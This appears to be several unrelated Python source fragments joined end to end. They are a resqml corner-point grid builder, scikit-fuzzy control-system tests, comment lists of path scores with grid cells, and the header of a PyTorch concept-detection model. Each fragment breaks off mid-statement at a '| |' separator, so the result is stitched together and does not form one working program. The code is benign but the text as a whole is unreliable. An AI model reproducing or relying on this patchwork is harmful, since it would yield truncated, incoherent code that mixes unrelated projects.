masked_cp_array[k, :, :, 1, :, :, :] += layer_gap_unmasked
k_gap_raw_index[k + 1] = k + k_gaps
elif max_gap > 0.0:
# close voids (includes shifting x & y)
log.debug('closing voids')
gap *= 0.5
gap_unmasked = np.where(gap.mask, 0.0, gap)
masked_cp_array[1:, :, :, 0, :, :, :] -= gap_unmasked
masked_cp_array[:-1, :, :, 1, :, :, :] += gap_unmasked
if k_gaps: nk_plus_1 += k_gaps
if k_gap_raw_index is None: k_gap_raw_index = np.arange(nk, dtype = int)
# reduce cp array extent in k
log.debug('reducing k extent of corner point array (sharing points vertically)')
k_reduced_cp_array = ma.masked_array(np.zeros((nk_plus_1, nj, ni, 2, 2, 3))) # (nk+1+k_gaps, nj, ni, jp, ip, xyz)
k_reduced_cp_array[0, :, :, :, :, :] = masked_cp_array[0, :, :, 0, :, :, :]
k_reduced_cp_array[-1, :, :, :, :, :] = masked_cp_array[-1, :, :, 1, :, :, :]
if k_gaps:
raw_k = 1
for k in range(nk - 1):
# fill reduced array slice(s) for base of layer k and top of layer k + 1
if k_gap_after_layer[k]:
k_reduced_cp_array[raw_k, :, :, :, :, :] = masked_cp_array[k, :, :, 1, :, :, :]
raw_k += 1
k_reduced_cp_array[raw_k, :, :, :, :, :] = masked_cp_array[k + 1, :, :, 0, :, :, :]
raw_k += 1
else: # take data from either possible cp slice, whichever is defined
slice = masked_cp_array[k + 1, :, :, 0, :, :, :]
k_reduced_cp_array[raw_k, :, :, :, :, :] = np.where(slice.mask, masked_cp_array[k, :, :, 1, :, :, :], slice)
raw_k += 1
assert raw_k == nk + k_gaps
else:
slice = masked_cp_array[1:, :, :, 0, :, :, :]
# where cell geometry undefined, if cell above is defined, take data from cell above with kp = 1 and set shared point defined
k_reduced_cp_array[1:-1, :, :, :, :, :] = np.where(slice.mask, masked_cp_array[:-1, :, :, 1, :, :, :], slice)
# create 2D array of active columns (columns where at least one cell is active)
log.debug('creating 2D array of active columns')
active_mask_2D = np.any(active_mask, axis = 0)
# create primary pillar reference indices as one of four column corners around pillar, active column preferred
log.debug('creating primary pillar reference neighbourly indices')
primary_pillar_jip = np.zeros((nj_plus_1, ni_plus_1, 2), dtype = 'int') # (nj + 1, ni + 1, jp:ip)
primary_pillar_jip[-1, :, 0] = 1
primary_pillar_jip[:, -1, 1] = 1
for j in range(nj_plus_1):
for i in range(ni_plus_1):
if active_mask_2D[j - primary_pillar_jip[j, i, 0], i - primary_pillar_jip[j, i, 1]]: continue
if i > 0 and primary_pillar_jip[j, i, 1] == 0 and active_mask_2D[j - primary_pillar_jip[j, i, 0], i - 1]:
primary_pillar_jip[j, i, 1] = 1
continue
if j > 0 and primary_pillar_jip[j, i, 0] == 0 and active_mask_2D[j - 1, i - primary_pillar_jip[j, i, 1]]:
primary_pillar_jip[j, i, 0] = 1
continue
if i > 0 and j > 0 and primary_pillar_jip[j, i, 0] == 0 and primary_pillar_jip[j, i, 1] == 0 and active_mask_2D[j - 1, i - 1]:
primary_pillar_jip[j, i, :] = 1
# build extra pillar references for split pillars
extras_count = np.zeros((nj_plus_1, ni_plus_1), dtype = 'int') # count (0 to 3) of extras for pillar
extras_list_index = np.zeros((nj_plus_1, ni_plus_1), dtype = 'int') # index in list of 1st extra for pillar
extras_list = [] # list of (jp, ip)
extras_use = np.negative(np.ones((nj, ni, 2, 2), dtype = 'int')) # (j, i, jp, ip); -1 means use primary
if split_pillars:
log.debug('building extra pillar references for split pillars')
# loop over pillars
for j in range(nj_plus_1):
for i in range(ni_plus_1):
primary_jp = primary_pillar_jip[j, i, 0]
primary_ip = primary_pillar_jip[j, i, 1]
p_col_j = j - primary_jp
p_col_i = i - primary_ip
# loop over 4 columns surrounding this pillar
for jp in range(2):
col_j = j - jp
if col_j < 0 or col_j >= nj: continue # no column this side of pillar in j
for ip in range(2):
col_i = i - ip
if col_i < 0 or col_i >= ni: continue # no column this side of pillar in i
if jp == primary_jp and ip == primary_ip: continue # this column is the primary for this pillar
discrepancy = np.max(np.abs(k_reduced_cp_array[:, col_j, col_i, jp, ip, :] -
k_reduced_cp_array[:, p_col_j, p_col_i, primary_jp, primary_ip, :]))
if discrepancy <= split_tolerance:
continue # data for this column's corner aligns with primary
for e in range(extras_count[j, i]):
eli = extras_list_index[j, i] + e
pillar_j_extra = j - extras_list[eli][0]
pillar_i_extra = i - extras_list[eli][1]
discrepancy = np.max(np.abs(k_reduced_cp_array[:, col_j, col_i, jp, ip, :] -
k_reduced_cp_array[:, pillar_j_extra, pillar_i_extra, extras_list[eli][0], extras_list[eli][1], :]))
if discrepancy <= split_tolerance: # data for this corner aligns with existing extra
extras_use[col_j, col_i, jp, ip] = e
break
if extras_use[col_j, col_i, jp, ip] >= 0: # reusing an existing extra for this pillar
continue
# add this corner as an extra
if extras_count[j, i] == 0: # create entry point for this pillar in extras
extras_list_index[j, i] = len(extras_list)
extras_list.append((jp, ip))
extras_use[col_j, col_i, jp, ip] = extras_count[j, i]
extras_count[j, i] += 1
if len(extras_list) == 0: split_pillars = False
log.debug('number of extra pillars: ' + str(len(extras_list)))
# create points array as used in resqml
log.debug('creating points array as used in resqml format')
if split_pillars:
points_array = np.zeros((nk_plus_1, (nj_plus_1 * ni_plus_1) + len(extras_list), 3)) # note: nk_plus_1 might include k_gaps
index = 0
# primary pillars
for pillar_j in range(nj_plus_1):
for pillar_i in range(ni_plus_1):
(jp, ip) = primary_pillar_jip[pillar_j, pillar_i]
slice = k_reduced_cp_array[:, pillar_j - jp, pillar_i - ip, jp, ip, :]
points_array[:, index, :] = np.where(slice.mask, np.nan, slice) # NaN indicates undefined/invalid geometry
index += 1
# add extras for split pillars
for pillar_j in range(nj_plus_1):
for pillar_i in range(ni_plus_1):
for e in range(extras_count[pillar_j, pillar_i]):
eli = extras_list_index[pillar_j, pillar_i] + e
(jp, ip) = extras_list[eli]
pillar_j_extra = pillar_j - jp
pillar_i_extra = pillar_i - ip
slice = k_reduced_cp_array[:, pillar_j_extra, pillar_i_extra, jp, ip, :]
points_array[:, index, :] = np.where(slice.mask, np.nan, slice) # NaN indicates unedefined/invalid geometry
index += 1
assert(index == (nj_plus_1 * ni_plus_1) + len(extras_list))
else: # unsplit pillars
points_array = np.zeros((nk_plus_1, nj_plus_1, ni_plus_1, 3))
for j in range(nj_plus_1):
for i in range(ni_plus_1):
(jp, ip) = primary_pillar_jip[j, i]
slice = k_reduced_cp_array[:, j - jp, i - ip, jp, ip, :]
points_array[:, j, i, :] = np.where(slice.mask, np.nan, slice) # NaN indicates undefined/invalid geometry
# create an empty grid object and fill in some basic info
log.debug('initialising grid object')
grid = grr.Grid(model, extract_basics_from_xml = False)
grid.grid_representation = 'IjkGrid'
grid.extent_kji = np.array((nk, nj, ni), dtype = 'int')
grid.nk, grid.nj, grid.ni = nk, nj, ni
grid.k_direction_is_down = True # assumed direction for corp; todo: determine from geometry and crs z_inc_down flag
if known_to_be_straight:
grid.pillar_shape = | |
<gh_stars>100-1000
import networkx
import nose
import numpy as np
import numpy.testing as tst
import skfuzzy as fuzz
import skfuzzy.control as ctrl
from pytest import approx, raises
try:
from numpy.testing.decorators import skipif
except AttributeError:
from numpy.testing.dec import skipif
except ModuleNotFoundError:
from numpy.testing import dec
skipif = dec.skipif
from skfuzzy.control import EmptyMembershipError
def test_tipping_problem():
# The full tipping problem uses many of these methods
food = ctrl.Antecedent(np.linspace(0, 10, 11), 'quality')
service = ctrl.Antecedent(np.linspace(0, 10, 11), 'service')
tip = ctrl.Consequent(np.linspace(0, 25, 26), 'tip')
food.automf(3)
service.automf(3)
# Manual membership function definition
tip['bad'] = fuzz.trimf(tip.universe, [0, 0, 13])
tip['middling'] = fuzz.trimf(tip.universe, [0, 13, 25])
tip['lots'] = fuzz.trimf(tip.universe, [13, 25, 25])
# Define fuzzy rules
rule1 = ctrl.Rule(food['poor'] | service['poor'], tip['bad'])
rule2 = ctrl.Rule(service['average'], tip['middling'])
rule3 = ctrl.Rule(service['good'] | food['good'], tip['lots'])
# The control system - defined both possible ways
tipping = ctrl.ControlSystem([rule1, rule2, rule3])
tipping2 = ctrl.ControlSystem(rule1)
tipping2.addrule(rule2)
tipping2.addrule(rule3)
tip_sim = ctrl.ControlSystemSimulation(tipping)
tip_sim2 = ctrl.ControlSystemSimulation(tipping2)
# Inputs added both possible ways
inputs = {'quality': 6.5, 'service': 9.8}
for key, value in inputs.items():
tip_sim.input[key] = value
tip_sim2.inputs(inputs)
# Compute the system
tip_sim.compute()
tip_sim2.compute()
# Ensure both methods of defining rules yield the same results
for val0, val1 in zip(tip_sim.output.values(),
tip_sim2.output.values()):
tst.assert_allclose(val0, val1)
# Verify against manual computation
tst.assert_allclose(tip_sim.output['tip'], 19.8578, atol=1e-2, rtol=1e-2)
def setup_rule_order():
global a, b, c, d
a = ctrl.Antecedent(np.linspace(0, 10, 11), 'a')
b = ctrl.Antecedent(np.linspace(0, 10, 11), 'b')
c = ctrl.Antecedent(np.linspace(0, 10, 11), 'c')
d = ctrl.Antecedent(np.linspace(0, 10, 11), 'd')
for v in (a, b, c, d):
v.automf(3)
def test_bad_inputs():
# Start with the tipping problem
food = ctrl.Antecedent(np.linspace(0, 10, 11), 'quality')
service = ctrl.Antecedent(np.linspace(0, 10, 11), 'service')
tip = ctrl.Consequent(np.linspace(0, 25, 26), 'tip')
food.automf(3)
service.automf(3)
# Manual membership function definition
tip['bad'] = fuzz.trimf(tip.universe, [0, 0, 13])
tip['middling'] = fuzz.trimf(tip.universe, [0, 13, 25])
tip['lots'] = fuzz.trimf(tip.universe, [13, 25, 25])
# Define fuzzy rules
rule1 = ctrl.Rule(food['poor'] | service['poor'], tip['bad'])
rule2 = ctrl.Rule(service['average'], tip['middling'])
rule3 = ctrl.Rule(service['good'] | food['good'], tip['lots'])
# The control system - defined both possible ways
tipping = ctrl.ControlSystem([rule1, rule2, rule3])
tipping2 = ctrl.ControlSystem(rule1)
tipping2.addrule(rule2)
tipping2.addrule(rule3)
tip_sim = ctrl.ControlSystemSimulation(tipping, clip_to_bounds=False)
tip_sim2 = ctrl.ControlSystemSimulation(tipping2, clip_to_bounds=True)
# With clipping to bounds, these should work
tip_sim2.input['quality'] = -np.pi # below minimum, clipped to 0
tip_sim2.input['service'] = 15 # above maximum, clipped to 10
# Ensure the input checking is working properly when bounds aren't clipped
negative_pass = False
try:
tip_sim.input['quality'] = -np.pi # below minimum in universe
except IndexError:
negative_pass = True # It should raise this
else:
if not negative_pass:
raise ValueError('Input checking is not working correctly! '
'Minimum universe valuse is 0, but -3.14 did not '
'raise an IndexError.')
positive_pass = False
try:
tip_sim.input['quality'] = 15 # above maximum in universe
except IndexError:
positive_pass = True # It should raise this
else:
if not positive_pass:
raise ValueError('Input checking is not working correctly! '
'Maximum universe valuse is 10, but 15 did not '
'raise an IndexError.')
@skipif(float(networkx.__version__) >= 2.0)
@nose.with_setup(setup_rule_order)
def test_rule_order():
# Make sure rules are exposed in the order needed to solve them
# correctly
global a, b, c, d
r1 = ctrl.Rule(a['average'] | a['poor'], c['poor'], label='r1')
r2 = ctrl.Rule(c['poor'] | b['poor'], c['good'], label='r2')
r3 = ctrl.Rule(c['good'] | a['good'], d['good'], label='r3')
ctrl_sys = ctrl.ControlSystem([r1, r2, r3])
resolved = list(ctrl_sys.rules)
assert resolved == [r1, r2, r3], ("Order given was: {0}, expected {1}"
.format(resolved,
[r1.label, r2.label, r3.label]))
# The assert_raises decorator does not work in Python 2.6
@skipif(float(networkx.__version__) >= 2.0)
@nose.with_setup(setup_rule_order)
def test_unresolvable_rule_order():
# Make sure we don't get suck in an infinite loop when the user
# gives an unresolvable rule order
global a, b, c, d
r1 = ctrl.Rule(a['average'] | a['poor'], c['poor'], label='r1')
r2 = ctrl.Rule(c['poor'] | b['poor'], c['poor'], label='r2')
r3 = ctrl.Rule(c['good'] | a['good'], d['good'], label='r3')
ex_msg = "Unable to resolve rule execution order"
with tst.assert_raises(RuntimeError, expected_regexp=ex_msg):
ctrl_sys = ctrl.ControlSystem([r1, r2, r3])
list(ctrl_sys.rules)
@nose.with_setup(setup_rule_order)
def test_bad_rules():
global a
not_rules = ['me', 192238, 42, dict()]
tst.assert_raises(ValueError, ctrl.ControlSystem, not_rules)
testsystem = ctrl.ControlSystem()
tst.assert_raises(ValueError, testsystem.addrule, a)
def test_lenient_simulation():
x1 = ctrl.Antecedent(np.linspace(0, 10, 11), "x1")
x1.automf(3) # term labels: poor, average, good
x2 = ctrl.Antecedent(np.linspace(0, 10, 11), "x2")
x2.automf(3)
y1 = ctrl.Consequent(np.linspace(0, 10, 11), "y1")
y1.automf(3)
y2 = ctrl.Consequent(np.linspace(0, 10, 11), "y2")
y2.automf(3)
r1 = ctrl.Rule(x1["poor"], y1["good"])
r2 = ctrl.Rule(x2["poor"], y2["good"])
sys = ctrl.ControlSystem([r1, r2])
sim = ctrl.ControlSystemSimulation(sys)
sim.input["x1"] = 0
sim.input["x2"] = 0
sim.compute()
assert set(sim.output.keys()) == {"y1", "y2"}
# print("- sim.output['y1']:", sim.output["y1"])
# print("- sim.output['y2']:", sim.output["y2"])
assert sim.output["y1"] == approx(8.333333)
assert sim.output["y2"] == approx(8.333333)
sim = ctrl.ControlSystemSimulation(sys, lenient=False)
sim.input["x1"] = 10
sim.input["x2"] = 0
with raises(EmptyMembershipError):
sim.compute()
sim = ctrl.ControlSystemSimulation(sys, lenient=True)
sim.input["x1"] = 10
sim.input["x2"] = 0
sim.compute()
assert set(sim.output.keys()) == {"y2"}
assert sim.output["y2"] == approx(8.333333)
def test_cached_lenient_simulation():
x1 = ctrl.Antecedent(np.linspace(0, 10, 11), "x1")
x1.automf(3) # term labels: poor, average, good
x2 = ctrl.Antecedent(np.linspace(0, 10, 11), "x2")
x2.automf(3)
y1 = ctrl.Consequent(np.linspace(0, 10, 11), "y1")
y1.automf(3)
y2 = ctrl.Consequent(np.linspace(0, 10, 11), "y2")
y2.automf(3)
r1 = ctrl.Rule(x1["poor"], y1["good"])
r2 = ctrl.Rule(x2["poor"], y2["good"])
sys = ctrl.ControlSystem([r1, r2])
sim = ctrl.ControlSystemSimulation(sys)
sim.input["x1"] = 10
sim.input["x2"] = 0
sim.compute()
# print("- sim.output.keys:", set(sim.output.keys()))
assert set(sim.output.keys()) == {"y2"}
sim.compute()
assert set(sim.output.keys()) == {"y2"}
def test_multiple_rules_same_consequent_term():
# 2 input variables, 1 output variable and 7 instances.
x1_inputs = [0.6, 0.2, 0.4, 0.7, 1, 1.2, 1.8]
x2_inputs = [0.9, 1, 0.8, 0, 1.2, 0.6, 1.8]
dom = np.arange(0, 2.1, 0.01)
x1 = ctrl.Antecedent(dom, "x1")
x1['label0'] = fuzz.trimf(x1.universe, (0.2, 0.2, 0.6))
x1['label1'] = fuzz.trimf(x1.universe, (0.2, 0.6, 1.0))
x1['label2'] = fuzz.trimf(x1.universe, (0.6, 1.0, 1.4))
x1['label3'] = fuzz.trimf(x1.universe, (1.0, 1.4, 1.8))
x1['label4'] = fuzz.trimf(x1.universe, (1.4, 1.8, 1.8))
x2 = ctrl.Antecedent(dom, "x2")
x2['label0'] = fuzz.trimf(x2.universe, (0.0, 0.0, 0.45))
x2['label1'] = fuzz.trimf(x2.universe, (0.0, 0.45, 0.9))
x2['label2'] = fuzz.trimf(x2.universe, (0.45, 0.9, 1.35))
x2['label3'] = fuzz.trimf(x2.universe, (0.9, 1.35, 1.8))
x2['label4'] = fuzz.trimf(x2.universe, (1.35, 1.8, 1.8))
y = ctrl.Consequent(dom, "y")
y['label0'] = fuzz.trimf(y.universe, (0.3, 0.3, 0.725))
y['label1'] = fuzz.trimf(y.universe, (0.3, 0.725, 1.15))
y['label2'] = fuzz.trimf(y.universe, (0.725, 1.15, 1.575))
y['label3'] = fuzz.trimf(y.universe, (1.15, 1.575, 2.0))
y['label4'] = fuzz.trimf(y.universe, (1.575, 2.0, 2.0))
r1 = ctrl.Rule(x1['label0'] & x2['label2'], y['label0'])
r2 = ctrl.Rule(x1['label1'] & x2['label0'], y['label0'])
r3 = ctrl.Rule(x1['label1'] & x2['label2'], y['label0'])
# Equivalent to above 3 rules
r123 = ctrl.Rule((x1['label0'] & x2['label2']) |
(x1['label1'] & x2['label0']) |
(x1['label1'] & x2['label2']), y['label0'])
r4 = ctrl.Rule(x1['label2'] & x2['label1'], y['label2'])
r5 = ctrl.Rule(x1['label2'] & x2['label3'], y['label3'])
r6 = ctrl.Rule(x1['label4'] & x2['label4'], y['label4'])
# Build a system with three rules targeting the same Consequent Term,
# and then an equivalent system with those three rules combined into one.
cs0 = ctrl.ControlSystem([r1, r2, r3, r4, r5, r6])
cs1 = ctrl.ControlSystem([r123, r4, r5, r6])
expected_results = [0.438372093023,
0.443962536855,
0.461436409933,
0.445290345769,
1.575,
1.15,
1.86162790698]
# Ensure the results are equivalent within error
for inst, expected in zip(range(7), expected_results):
sim0 = ctrl.ControlSystemSimulation(cs0)
sim1 = ctrl.ControlSystemSimulation(cs1)
sim0.input["x1"] = x1_inputs[inst]
sim0.input["x2"] = x2_inputs[inst]
sim1.input["x1"] = x1_inputs[inst]
sim1.input["x2"] = x2_inputs[inst]
sim0.compute()
sim1.compute()
tst.assert_allclose(sim0.output['y'], sim1.output['y'])
tst.assert_allclose(expected, sim0.output['y'], atol=1e-4, rtol=1e-4)
def test_complex_system():
# A much more complex system, run multiple times & with array inputs
universe = np.linspace(-2, 2, 5)
error = ctrl.Antecedent(universe, 'error')
delta = ctrl.Antecedent(universe, 'delta')
output = ctrl.Consequent(universe, 'output')
names = ['nb', 'ns', 'ze', 'ps', 'pb']
error.automf(names=names)
delta.automf(names=names)
output.automf(names=names)
# The rulebase:
# rule 1: IF e = ZE AND delta = ZE THEN output = ZE
# rule 2: IF e = ZE AND delta = SP THEN output = SN
# rule 3: IF e = SN AND delta = SN THEN output = LP
# rule 4: IF e = LP OR delta = LP THEN output = LN
rule0 = ctrl.Rule(antecedent=((error['nb'] & delta['nb']) |
(error['ns'] & delta['nb']) |
(error['nb'] & delta['ns'])),
consequent=output['nb'], label='rule nb')
rule1 = ctrl.Rule(antecedent=((error['nb'] & delta['ze']) |
(error['nb'] & delta['ps']) |
(error['ns'] & delta['ns']) |
(error['ns'] & delta['ze']) |
(error['ze'] & delta['ns']) |
(error['ze'] & delta['nb']) |
(error['ps'] & delta['nb'])),
consequent=output['ns'], label='rule ns')
rule2 = ctrl.Rule(antecedent=((error['nb'] & delta['pb']) |
(error['ns'] & delta['ps']) |
(error['ze'] & delta['ze']) |
(error['ps'] & delta['ns']) |
(error['pb'] & delta['nb'])),
consequent=output['ze'], label='rule ze')
rule3 = ctrl.Rule(antecedent=((error['ns'] & delta['pb']) |
(error['ze'] & delta['pb']) |
(error['ze'] & delta['ps']) |
(error['ps'] & delta['ps']) |
(error['ps'] & delta['ze']) |
(error['pb'] | |
A4 A5 A7 B4 F7
# Score 5 for path: ['E', 'E', 'S', 'S', 'S', 'E', 'N', 'E', 'S', 'S', 'S', 'W', 'W', 'W', 'N', 'N']
# A5 B2 B5 E3 F5
# Score 5 for path: ['S', 'W', 'W', 'W', 'N', 'E', 'N', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'E', 'N']
# D6 D7 F6 F7 I5
# checkExhaustivePathsWithAutoRepairPatterns(12, 8)
# Score 8 for path: ['E', 'S', 'S', 'S', 'S', 'W', 'S', 'E', 'E', 'S', 'W', 'W']
# A1 A2 A3 A4 C2 E3 E4 H1
# Score 8 for path: ['E', 'S', 'S', 'S', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# C2 C3 D2 E1 E2 E4 F1 I4
# Score 8 for path: ['W', 'W', 'N', 'N', 'E', 'E', 'N', 'W', 'N', 'N', 'E', 'N']
# C8 D10 E7 E10 F7 I10 J7 J8
# Score 8 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'N', 'N', 'E', 'N']
# D10 E7 E8 E10 F7 G9 I10 J7
# Score 8 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'N']
# D8 D10 E7 E8 F7 G9 I10 J7
# Score 8 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'N', 'E', 'E', 'N', 'N', 'N']
# D8 D10 E8 F7 F8 F10 I8 J10
# Score 9 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'N']
# D8 D10 E7 E8 F7 F10 I8 I10 J10
# Score 8 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'S', 'E']
# B2 B4 C2 D2 D4 E1 E2 G2
# Score 8 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S', 'S', 'S', 'E']
# D2 D4 E2 F4 G2 G4 I2 J2
# Score 8 for path: ['E', 'E', 'S', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'S', 'E']
# B2 B3 C2 D2 D4 E1 E2 G3
# Score 8 for path: ['N', 'N', 'N', 'E', 'N', 'N', 'N', 'E', 'S', 'E', 'S', 'S']
# A7 A8 C8 C9 C10 D7 D8 E10
# Score 9 for path: ['N', 'N', 'N', 'E', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'S']
# A8 A9 C8 C9 C10 D7 D8 F7 F9
# Score 9 for path: ['N', 'N', 'N', 'E', 'S', 'S', 'S', 'E', 'E', 'N', 'N', 'N']
# A5 A6 A7 A8 B10 C8 D5 F5 F6
# Score 10 for path: ['N', 'N', 'N', 'E', 'S', 'S', 'E', 'S', 'E', 'N', 'N', 'N']
# A6 A7 A8 B4 C8 C9 D5 D6 F6 F7
# Score 10 for path: ['N', 'N', 'N', 'E', 'S', 'E', 'S', 'S', 'E', 'N', 'N', 'N']
# A7 A8 B4 B5 C9 C10 D5 D6 F7 F8
# Score 8 for path: ['N', 'N', 'N', 'E', 'E', 'S', 'S', 'S', 'E', 'N', 'N', 'N']
# A8 B5 C10 D5 D6 F8 G4 G6
# Score 8 for path: ['N', 'N', 'E', 'N', 'E', 'S', 'S', 'S', 'E', 'N', 'N', 'N']
# A8 B5 C10 D4 D5 D6 F8 G10
# Score 8 for path: ['S', 'S', 'S', 'E', 'N', 'N', 'N', 'E', 'E', 'S', 'S', 'S']
# A2 A3 A5 B7 C5 D2 F1 F3
# Score 9 for path: ['S', 'S', 'S', 'E', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 C7 D4 D5 F5
# Score 8 for path: ['S', 'S', 'E', 'S', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 D5 D6 G4
# Score 8 for path: ['S', 'E', 'S', 'S', 'E', 'N', 'N', 'N', 'N', 'E', 'N', 'N']
# A6 A7 B4 B5 D6 D7 G4 G5
# Score 8 for path: ['S', 'E', 'S', 'S', 'E', 'N', 'N', 'N', 'E', 'N', 'N', 'N']
# A5 A6 A7 B4 B5 D6 G4 G5
# checkExhaustivePathsWithAutoRepairPatterns(16, 6)
# Score 6 for path: ['E', 'N', 'E', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 G8 H5 H7 H8
# Score 6 for path: ['E', 'N', 'W', 'N', 'E', 'N', 'W', 'W', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 F5 F6 H8 I4
# Score 6 for path: ['E', 'N', 'W', 'N', 'E', 'N', 'W', 'W', 'W', 'W', 'W', 'S', 'S', 'E', 'S', 'E']
# E5 E10 F6 H8 I4 I6
# Score 6 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'S', 'E', 'S', 'W', 'S', 'E']
# D4 D5 D10 E10 G5 H5
# Score 6 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# E5 E10 G8 G10 H5 H7
# Score 7 for path: ['E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E10 G8 G10 H5 H7 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'S', 'E', 'S', 'W', 'S', 'E']
# D4 D5 D10 E9 E10 H5
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'S', 'W', 'S', 'S', 'E', 'E']
# E5 E9 E10 G8 H5 H7
# Score 8 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E9 E10 F6 G8 H5 H7 H8
# Score 7 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'E', 'S', 'E']
# E5 E9 E10 F6 G8 H5 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'N', 'W', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S']
# E9 E10 F6 G8 H5 H8
# Score 6 for path: ['E', 'E', 'N', 'W', 'W', 'N', 'W', 'N', 'W', 'W', 'W', 'S', 'S', 'S', 'E', 'E']
# E5 E9 E10 F6 H7 H8
# Score 6 for path: ['W', 'W', 'N', 'W', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E7 E8 G9 I10
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'N', 'E', 'E', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E8 F8 G8 I8
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'N', 'W', 'W', 'W', 'N', 'E']
# D8 D10 E7 E8 I8 I10
# Score 6 for path: ['W', 'W', 'W', 'N', 'N', 'E', 'E', 'N', 'E', 'N', 'E', 'N', 'W', 'W', 'W', 'N']
# D8 E7 E8 F10 I8 I10
# Score 6 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'W', 'W', 'N', 'N', 'W', 'N', 'E', 'E']
# E2 E7 F5 G2 G5 H7
# Score 7 for path: ['S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'W', 'W', 'N', 'E', 'N', 'W', 'N', 'E']
# D2 D4 D7 E7 F5 G2 H7
# Score 6 for path: ['S', 'W', 'W', 'S', 'W', 'S', 'E', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F4 G1 I2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E', 'E']
# E2 E4 F4 G1 G4 J2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'S', 'E', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F4 G1 I2
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'S', 'E', 'S', 'W', 'W', 'S', 'W', 'S', 'E', 'E']
# E4 F1 F4 G1 I2 J4
# Score 8 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'S', 'E', 'E', 'S', 'W', 'W', 'W', 'S', 'S', 'E']
# D2 D4 E4 F1 F4 G1 I2 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'S', 'W', 'S', 'E', 'E']
# E1 E4 F1 G1 I4 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'S', 'E', 'E']
# E1 E4 F1 G1 I4 J4
# Score 6 for path: ['S', 'W', 'W', 'W', 'S', 'E', 'E', 'S', 'S', 'W', 'W', 'W', 'S', 'E', 'S', 'E']
# E1 E4 F1 G1 I4 J4
# Score 7 | |
"""Model for concept detection, and its training and evaluation handle."""
# Copyright (c) 2020 Continental Automotive GmbH
import hashlib
import logging
from typing import Optional, Tuple, Dict, Any, Sequence, Callable
import numpy as np
import torch
import torch.nn
from .base_handles import EarlyStoppingHandle, ResettableOptimizer, \
TrainEvalHandle
from .model_extension import ModelStump, output_size
from ..concepts import SegmentationConcept2D, ConceptTypes
from ..embeddings import ConceptEmbedding
from ...datasets import DatasetSplit, BaseDataset, ActivationDatasetWrapper, \
DataTriple
from ...datasets.transforms import SameSize, same_padding, TupleTransforms, \
Compose, ToDevice, OnBothSides
LOGGER = logging.getLogger(__name__)
class ConceptDetectionModel2D(torch.nn.Module):
"""Pytorch model implementation of a concept embedding for 2D conv layers.
The model itself simply is a convolutional layer with sigmoid activation.
The goal of this model is to tell from an activation map, which spatial
"parts" of the activation map belong to a given concept and which not.
These parts are windows of the concept model :py:attr:`kernel_size`.
The model features training and evaluation functionality for concept
analysis, i.e. for training this concept module on the activation map output
of the given model and layer without changing the main model.
When the model forward works as follows:
:Input: Activation map output of a 2D convolutional layer.
:Output:
Heatmap showing which centers of boxes of :py:attr:`kernel_size` belong
to :py:attr:`concept`.
The heatmap values are the sigmoid of a convolution operation.
"""
@property
def concept(self) -> Optional[SegmentationConcept2D]:
"""The concept (data) for which this model is/should be trained."""
return self._concept
@property
def concept_name(self) -> str:
"""The name of the associated concept if known."""
return self._concept_name if self.concept is None else self.concept.name
@property
def main_model_stump(self) -> ModelStump:
"""Stump of the main model in the head of which to localize the
concept embedding.
Used to generate the activation maps needed for concept analysis
training. The actual attribute is wrapped into a tuple to hide the
parameters, since these shall not be updated; see
https://discuss.pytorch.org/t/how-to-exclude-parameters-from-model/6151
"""
return self._main_model_stump[0]
@main_model_stump.setter
def main_model_stump(self, main_model_stump: ModelStump) -> None:
"""Setter of :py:attr:`main_model_stump`."""
